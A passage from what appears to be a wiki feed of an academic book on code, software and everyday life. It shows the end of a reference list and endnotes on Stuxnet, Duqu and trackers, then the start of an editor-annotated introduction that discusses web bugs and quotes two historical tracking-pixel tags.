&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4699</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4699"/>
		<updated>2012-04-18T13:44:47Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
